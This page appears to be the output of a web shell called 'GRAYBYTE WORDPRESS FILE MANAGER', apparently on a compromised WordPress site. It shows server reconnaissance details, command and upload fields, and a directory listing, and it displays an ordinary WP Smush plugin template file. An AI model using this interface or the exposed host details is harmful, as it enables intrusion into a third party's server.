GRAYBYTE WORDPRESS FILE MANAGER7008

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/wp-smushit/app/views/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/wp-smushit/app/views//settings-row.php
<?php
/**
 * Settings row layout.
 *
 * @package WP_Smush
 *
 * @var \Smush\App\Abstract_Page $this
 *
 * @var string $name     Setting name.
 * @var bool   $value    Setting value.
 * @var bool   $disable  Disabled status.
 * @var bool   $upsell   Upsell status.
 */

use Smush\Core\Settings;

if ( ! defined( 'WPINC' ) ) {
	die;
}

$custom_fields = array(
	'lossy'                    => 'bulk/lossy-level',
	Settings::NEXT_GEN_CDN_KEY => 'cdn/next-gen-conversion-setting',
);

?>

<div class="sui-box-settings-row <?php echo $upsell ? 'sui-box-upsell-row' : ''; ?> <?php echo $disable && ! $upsell ? 'sui-disabled' : ''; ?> <?php echo esc_attr( $name ); ?>-settings-row" id="<?php echo esc_attr( $name ); ?>-settings-row">
	<div class="sui-box-settings-col-1">
		<span class="sui-settings-label <?php echo 'gutenberg' === $name ? 'sui-settings-label-with-tag' : ''; ?>">
			<?php echo esc_html( Settings::get_setting_data( $name, 'short-label' ) ); ?>
			<?php do_action( 'smush_setting_column_tag', $name ); ?>
		</span>
		<span class="sui-description">
			<?php echo wp_kses_post( Settings::get_setting_data( $name, 'desc' ) ); ?>
		</span>
	</div>
	<div class="sui-box-settings-col-2" id="column-<?php echo esc_attr( $name ); ?>">
		<?php if ( isset( $custom_fields[ $name ]) ) : ?>
			<span style="font-weight:500" id="<?php echo esc_attr( $name . '-label' ); ?>" class="sui-toggle-label">
				<?php echo esc_html( Settings::get_setting_data( $name, 'label' ) ); ?>
			</span>
			<div class="sui-form-field">
				<?php
					$template_part = $custom_fields[ $name ];
					$this->view(
						$template_part,
						array(
							'name' => $name,
						)
					);
				?>
				<!-- Print/Perform action in right setting column -->
				<?php do_action( 'smush_setting_column_right_inside', $name ); ?>
			</div>
			<?php do_action( 'smush_setting_column_right_additional', $name ); ?>
		<?php elseif ( 'bulk' !== $name ) : ?>
			<div class="sui-form-field">
				<label for="<?php echo esc_attr( $name ); ?>" class="sui-toggle">
					<input
						type="checkbox"
						id="<?php echo esc_attr( $name ); ?>"
						name="<?php echo esc_attr( $name ); ?>"
						aria-labelledby="<?php echo esc_attr( $name . '-label' ); ?>"
						aria-describedby="<?php echo esc_attr( $name . '-desc' ); ?>"
						<?php checked( $value, 1, true ); ?>
						<?php disabled( $disable ); ?>
					/>
					<span class="sui-toggle-slider" aria-hidden="true"></span>
					<span id="<?php echo esc_attr( $name . '-label' ); ?>" class="sui-toggle-label">
						<?php echo esc_html( Settings::get_setting_data( $name, 'label' ) ); ?>
					</span>
					<!-- Print/Perform action in right setting column -->
					<?php do_action( 'smush_setting_column_right_inside', $name ); ?>
				</label>
				<?php do_action( 'smush_setting_column_right_additional', $name ); ?>
			</div>
		<?php endif; ?>
		<!-- Print/Perform action in right setting column -->
		<?php do_action( 'smush_setting_column_right_outside', $name ); ?>
	</div>
</div>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
bulk
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
bulk-settings
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
cdn
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
dashboard
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
directory
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
email
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
integrations
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
lazyload
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
next-gen
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
nextgen
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
settings
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
summary
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
webp
--
July 10 2025 04:32:34
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:34
giriqfky / giriqfky
0644
meta-box.php
2.475 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644
settings-row.php
2.93 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644
smush-nextgen-page.php
0.222 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644
smush-page.php
2.382 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644
smush-upgrade-page.php
11.271 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644
tabs.php
1.134 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF